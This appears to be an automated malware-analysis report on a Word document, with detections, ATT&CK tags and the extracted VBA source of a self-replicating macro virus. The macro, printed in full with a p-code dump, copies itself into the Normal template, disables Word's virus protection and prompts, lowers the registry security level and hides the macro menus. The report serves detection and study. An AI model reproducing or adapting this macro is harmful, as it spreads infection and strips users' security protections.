MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to disable security features and modify the document's code. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Onex-1' further indicate malicious intent.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5224 bytes |
SHA-256: 23629493e0be954c662a3516ce96c4351cd9093fac007fa98d74d4394f38eacd |
|||
|
Detection
ClamAV:
Doc.Trojan.Onex-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Extra"
Attribute VB_Base = "1TemplateProject.Extra"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
MsgBox "Íà äèñê íàòÿíóòà çàùèòà îò çàïèñè."
MsgBox "Òû ñäåëàë ÷òî-òî, ÷åãî ìû íå îæèäàëè. ×åì áû ýòî íè áûëî, äåëàòü ýòîãî íå ñòîèëî. Ïîïðîáóé äðóãîé ïîäõîä. "
Set c = New DataObject
If ActiveDocument.VBProject.VBComponents(1).Name <> "Extra" Then
Set go = ActiveDocument.VBProject.VBComponents(1)
saveit = True
ElseIf NormalTemplate.VBProject.VBComponents(1).Name <> "Extra" Then
Set go = NormalTemplate.VBProject.VBComponents(1)
End If
With go
c.SetText Extra.VBProject.VBComponents(1).CodeModule.lines(1, Extra.VBProject.VBComponents(1).CodeModule.countoflines)
.CodeModule.deletelines 1, .CodeModule.countoflines
.CodeModule.insertlines 1, c.GetText
.Name = "Extra"
End With
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
CommandBars("Tools").Controls("Macro").Enabled = 0
If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' mY FIRST VIRUS ! bY 4B4C4F50
' Processing file: /opt/analyzer/scan_staging/9d0acd09b1a8464ca8e67d0a1027f340.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Extra - 3044 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitStr 0x0022 "Íà äèñê íàòÿíóòà çàùèòà îò çàïèñè."
' ArgsCall MsgBox 0x0001
' Line #3:
' LitStr 0x006A "Òû ñäåëàë ÷òî-òî, ÷åãî ìû íå îæèäàëè. ×åì áû ýòî íè áûëî, äåëàòü ýòîãî íå ñòîèëî. Ïîïðîáóé äðóãîé ïîäõîä. "
' ArgsCall MsgBox 0x0001
' Line #4:
' SetStmt
' New <crash>
' Set c
' Line #5:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0005 "Extra"
' Ne
' IfBlock
' Line #6:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' Set GoSub
' Line #7:
' LitVarSpecial (True)
' St saveit
' Line #8:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0005 "Extra"
' Ne
' ElseIfBlock
' Line #9:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' Set GoSub
' Line #10:
' EndIfBlock
' Line #11:
' StartWithExpr
' Ld GoSub
' With
' Line #12:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld Extra
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' LitDI2 0x0001
' Ld Extra
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd lines 0x0002
' Ld c
' ArgsMemCall SetText 0x0001
' Line #13:
' LitDI2 0x0001
' MemLdWith CodeModule
' MemLd countoflines
' MemLdWith CodeModule
' ArgsMemCall deletelines 0x0002
' Line #14:
' LitDI2 0x0001
' Ld c
' MemLd GetText
' MemLdWith CodeModule
' ArgsMemCall insertlines 0x0002
' Line #15:
' LitStr 0x0005 "Extra"
' MemStWith New
' Line #16:
' EndWith
' Line #17:
' LitDI2 0x0000
' Ld Options
' MemSt ConfirmConversions
' Line #18:
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #19:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #20:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #2
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.